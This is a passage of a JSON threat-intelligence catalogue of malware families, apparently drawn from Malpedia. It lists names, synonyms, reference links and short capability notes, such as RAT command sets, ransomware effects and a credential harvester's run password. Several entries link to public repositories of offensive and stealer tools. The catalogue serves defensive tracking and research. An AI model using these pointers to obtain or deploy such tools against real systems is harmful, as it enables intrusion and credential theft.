described LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly-used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac, and Windows.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne", "https://github.com/AlessandroZ/LaZagne", "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf" ], "synonyms": [], "type": [] }, "uuid": "c752f295-7f08-4cb0-92d5-a0c562abd08c", "value": "LaZagne" }, { "description": "An IRC bot written in (obfuscated) Python code. Distributed in attack campaign FreakOut, written by author Freak/Fl0urite and development potentially dating back as far as 2015.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph", "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/" ], "synonyms": [ "FreakOut" ], "type": [] }, "uuid": "2351539a-165a-4886-b5fe-f56fdf6b167a", "value": "N3Cr0m0rPh" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.networm", "https://github.com/pylyf/NetWorm" ], "synonyms": [], "type": [] }, "uuid": "6c6acd00-cdc2-460d-8edf-003b84875b5d", "value": "NetWorm" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pirat", "https://vk.com/m228228?w=wall306895781_177" ], "synonyms": [], "type": [] }, "uuid": "bca94d33-e5a1-4bcc-981e-f35fd74a79d1", "value": "PIRAT" }, { "description": "Cisco Talos has discovered a Python-based RAT they call Poet RAT. It is dropped from a Word document and delivered including a Python interpreter and required libraries. The name originates from references to Shakespeare. Exfiltration happens through FTP.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat", "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://blog.talosintelligence.com/2020/10/poetrat-update.html", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] }, "uuid": "b07819a9-a2f7-454d-a520-c6424cbf1ed4", "value": "Poet RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf", "https://github.com/n1nj4sec/pupy" ], "synonyms": [], "type": [] }, "uuid": "afcc9bfc-1227-4bb0-a88a-5accdbfd58fa", "value": "pupy (Python)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyark", "https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/" ], "synonyms": [], "type": [] }, "uuid": "01f15f4e-dd40-4246-9b99-c0d81306e37f", "value": "PyArk" }, { "description": "PyVil RAT", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyvil", "https://www.cybereason.com/blog/no-rest-for-the-wicked-evilnum-unleashes-pyvil-rat", "https://twitter.com/ESETresearch/status/1360178593968623617" ], "synonyms": [], "type": [] }, "uuid": "2cf75f3c-116f-4faf-bd32-ba3a5e2327cf", "value": "PyVil" }, { "description": "Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.responder", "https://github.com/lgandx/Responder" ], "synonyms": [ "SpiderLabs Responder" ], "type": [] }, "uuid": "3271b5ca-c044-4ab8-bbfc-0d6e1a6601fc", "value": "Responder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", "https://www.youtube.com/watch?v=Bk-utzAlYFI" ], "synonyms": [], "type": [] }, "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", "value": "Saphyra" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.spacecow", "https://github.com/TheSph1nx/SpaceCow" ], "synonyms": [], "type": [] }, "uuid": "ff5c0845-6740-45d5-bd34-1cf69c635356", "value": "SpaceCow" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.stealler", "https://habr.com/en/sandbox/135410/" ], "synonyms": [], "type": [] }, "uuid": "689247a2-4e75-4802-ab94-484fc3d6a18e", "value": "stealler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.stitch", "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/", "https://github.com/nathanlopez/Stitch" ], "synonyms": [], "type": [] }, "uuid": "6239201b-a0bd-4f01-8bbe-79c6fc5fa861", "value": "Stitch" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001" ], "synonyms": [], "type": [] }, "uuid": "6d96cd1e-98f4-4784-9982-397c5df19bd9", "value": "unidentified_001" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002" ], "synonyms": [], "type": [] }, "uuid": "7e5fe6ca-3323-409a-a5bb-d34f60197b99", "value": "unidentified_002" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003" ], "synonyms": [], "type": [] }, "uuid": "43282411-4999-4066-9b99-2e94a17acbd4", "value": "unidentified_003" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "9f85f4fc-1cce-4557-b3d8-b9ef522fafb2", "value": "FlexiSpy (symbian)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.forbiks", "https://persianov.net/windows-worms-forbix-worm-analysis", "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2017-090807-0934-99" ], "synonyms": [ "Forbix" ], "type": [] }, "uuid": "2ad12163-3a8e-4ece-969e-ac616303ebe1", "value": "forbiks" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.ggldr", "https://www.forcepoint.com/blog/x-labs/carbanak-group-uses-google-malware-command-and-control" ], "synonyms": [], "type": [] }, "uuid": "8ca31b9b-6e78-4dcc-9d14-dfd97d44994e", "value": "GGLdr" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju", "https://medium.com/@vishal_thakur/grinju-malware-anti-analysis-on-steroids-part-1-535e72e650b8", "https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce" ], "synonyms": [], "type": [] }, "uuid": "f0a64323-62a6-4c5a-bb3d-44bd3b11507f", "value": "Grinju Downloader" }, { "description": "The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information.\r\nHALFBAKED listens for the following commands from the C2 server:\r\n\r\n info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI \r\n queries\r\n processList: Send list of process running\r\n screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)\r\n runvbs: Executes a VB script\r\n runexe: Executes EXE file\r\n runps1: Executes PowerShell script\r\n delete: Delete the specified file\r\n update: Update the specified file", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked", "https://attack.mitre.org/software/S0151/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" ], "synonyms": [], "type": [] }, "uuid": "095c995c-c916-488e-944d-a3f4b9842926", "value": "HALFBAKED" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.iloveyou", "https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496186" ], "synonyms": [ "Love Bug", "LoveLetter" ], "type": [] }, "uuid": "bba3f3c9-f65f-45f1-a482-7209b9fa5adb", "value": "Iloveyou" }, { "description": "Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBscript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files.\r\nThe malware targets banking clients in Portugal.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion", "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/", "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader", "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/", "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/", "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf" ], "synonyms": [], "type": [] }, "uuid": "97f89048-2a57-48d5-9272-0d1061a14eca", "value": "lampion" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lockscreen", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/lockscreen-ransomware-phishing-leads-to-google-play-card-scam/" ], "synonyms": [], "type": [] }, "uuid": "a583a2db-616e-48e5-b12b-088a378c2307", "value": "lockscreen" }, { "description": "Downloads NodeJS when deployed.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.nodejs_ransom", "https://dissectingmalwa.re/the-opposite-of-fileless-malware-nodejs-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "93c87125-7150-4bc6-a0f9-b46ff8de1839", "value": "NodeJS Ransomware" }, { "description": "According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starfighter", "https://github.com/Cn33liz/StarFighters" ], "synonyms": [], "type": [] }, "uuid": "e24b852c-3ede-42ac-8d04-68ab96bf53a0", "value": "Starfighter (VBScript)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_001", "https://twitter.com/JohnLaTwC/status/1118278148993339392" ], "synonyms": [], "type": [] }, "uuid": "ba354d45-bc41-40cd-93b2-26139db296bd", "value": "Unidentified VBS 001" }, { "description": "Unnamed malware. Delivered as remote template that drops a VBS file, which uses LOLBINs to crawl the disk and exfiltrate data zipped up via winrar.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_002", "https://www.clearskysec.com/operation-kremlin/" ], "synonyms": [], "type": [] }, "uuid": "d8e8d701-ebe4-44ab-8c5b-70a11246ddf1", "value": "Unidentified 002 (Operation Kremlin)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003", "https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/" ], "synonyms": [], "type": [] }, "uuid": "d5955c4b-f507-4b3f-8d57-080849aba831", "value": "Unidentified 003 (Gamaredon Downloader)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.whiteshadow", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware" ], "synonyms": [], "type": [] }, "uuid": "dc857b7d-f228-4aa5-9e89-f7e17bb7ea8c", "value": "WhiteShadow" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger", "https://habr.com/ru/company/group-ib/blog/477198/", "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89" ], "synonyms": [ "404KeyLogger", "Snake Keylogger" ], "type": [] }, "uuid": "6b87fada-86b3-449d-826d-a89858121b68", "value": "404 Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat", "https://github.com/securitykitten/malware_references/blob/master/crowdstrike-intelligence-report-putter-panda.original.pdf" ], "synonyms": [], "type": [] }, "uuid": "823f4eb9-ad37-4fab-8e69-3bdae47a0028", "value": "4h_rat" }, { "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" ], "synonyms": [], "type": [] }, "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", "value": "7ev3n" }, { "description": "8T_Dropper has been used by Chinese threat actor TA428 in order to install Cotx RAT onto victim's machines during Operation LagTime IT. According to Proofpoint the attack was developed against a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper", "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?", "https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f", "https://nao-sec.org/2021/01/royal-road-redive.html", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", "https://blog.malwarelab.pl/posts/on_the_royal_road/", "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://community.riskiq.com/article/56fa1b2f", "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746", "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/", "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", "https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241", "https://community.riskiq.com/article/5fe2da7f" ], "synonyms": [ "8t_dropper", "RoyalRoad" ], "type": [] }, "uuid": "df755d5f-db11-417d-8fed-b7abdc826590", "value": "8.t Dropper" }, { "description": "9002 RAT is a Remote Access Tool typically observed to be used by an APT to control a victim's machine. It has been spread over via zero day exploits (e.g. targeting Internet Explorer) as well as via email attachments. The infection chain starts by opening a .LNK (an OLE packager shell object) that executes a Powershell command.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf", "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", "https://www.infopoint-security.de/medien/the-elderwood-project.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-express", "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" ], "synonyms": [ "HOMEUNIX", "Hydraq", "McRAT" ], "type": [] }, "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", "value": "9002 RAT" }, { "description": "Uses Discord as C&C, has ransomware feature.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon", "https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/" ], "synonyms": [], "type": [] }, "uuid": "97be2d1a-878d-46bd-8ee7-d8798ec61ef1", "value": "Abaddon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", "https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/", "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" ], "synonyms": [ "PinkKite", "TinyPOS" ], "type": [] }, "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", "value": "AbaddonPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes" ], "synonyms": [], "type": [] }, "uuid": "27b54000-26b5-405f-9296-9fbc9217a8c9", "value": "abantes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" ], "synonyms": [], "type": [] }, "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", "value": "Abbath Banker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader", "https://github.com/Tlgyt/AbSent-Loader", "https://twitter.com/cocaman/status/1260069549069733888" ], "synonyms": [], "type": [] }, "uuid": "532d67fc-0c93-4345-80c4-0c1657056d5e", "value": "AbSent Loader" }, { "description": "A Linux backdoor that was apparently ported to Windows. This entry represents the Windows version. It appears the Linux version was written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor", "https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/" ], "synonyms": [], "type": [] }, "uuid": "9aa1a516-bd88-4038-a37d-cf66c607e68c", "value": "ACBackdoor (Windows)" }, { "description": "ACEHASH is described by FireEye as combined credential harvester that consists of two components, a loader and encrypted/compressed payload. To execute, a password is necessary (e.g. 9839D7F1A0) and the individual modules are addressed with parameters (-m, -w, -h).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash", "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", "https://www.secureworks.com/research/threat-profiles/bronze-atlas" ], "synonyms": [], "type": [] }, "uuid": "51f8c94a-572f-450b-a52f-d3da96302d6b", "value": "ACEHASH" }, { "description": "Unit42 found AcidBox in February 2019 and describes it as a malware family used by an unknown threat actor in 2017 against Russian entities, as stated by Dr.Web. It reused and improved an exploit for VirtualBox previously used by Turla. The malware itself is a modular toolkit, featuring both usermode and kernelmode components and anti-analysis techniques such as stack-based string obfuscation or dynamic XOR-encoded API usage.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://www.epicturla.com/blog/acidbox-clustering", "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", "https://unit42.paloaltonetworks.com/acidbox-rare-malware/" ], "synonyms": [ "MagicScroll" ], "type": [] }, "uuid": "4ccc1ec4-6008-4788-95d9-248749f5a7fe", "value": "AcidBox" }, { "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" ], "synonyms": [], "type": [] }, "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", "value": "AcridRain" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym" ], "synonyms": [], "type": [] }, "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", "value": "Acronym" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adamantium_thief", "https://github.com/LimerBoy/Adamantium-Thief" ], "synonyms": [], "type": [] }, "uuid": "28e01527-dbb5-4331-b5bf-5658ebf58297", "value": "Adamantium Thief" }, { "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016", "https://twitter.com/JaromirHorejsi/status/813712587997249536" ], "synonyms": [], "type": [] }, "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", "value": "AdamLocker" }, { "description": "Some Ransomware distributed by TA547 in Australia", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka", "https://www.proofpoint.com/us/blog/security-briefs/ta547-pivots-ursnif-banking-trojan-ransomware-australian-campaign" ], "synonyms": [], "type": [] }, "uuid": "ebf31d45-922a-42ad-b326-8a72ba6dead7", "value": "Adhubllka" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob", "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/" ], "synonyms": [], "type": [] }, "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf", "value": "AdKoob" }, { "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot", "https://www.bromium.com/second-stage-attack-analysis/" ], "synonyms": [], "type": [] }, "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5", "value": "AdvisorsBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz", "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" ], "synonyms": [], "type": [] }, "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", "value": "Adylkuzz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita", "https://twitter.com/_CPResearch_/status/1201957880909484033", "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html", "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md" ], "synonyms": [], "type": [] }, "uuid": "4c9f8ad2-ace4-42e5-ab70-efdfaad4d1bd", "value": "Afrodita" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", "https://unit42.paloaltonetworks.com/ironnetinjector/", "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4", "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a", "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat" ], "synonyms": [ "ComRAT", "Minit", "Sun rootkit" ], "type": [] }, "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", "value": "Agent.BTZ" }, { "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/", "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4", "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/", "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/", "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/", "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", "https://isc.sans.edu/diary/27088", "https://www.secureworks.com/research/threat-profiles/gold-galleon", "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/", "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/", "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", "https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf", "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir", "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", "https://blog.minerva-labs.com/preventing-agenttesla", 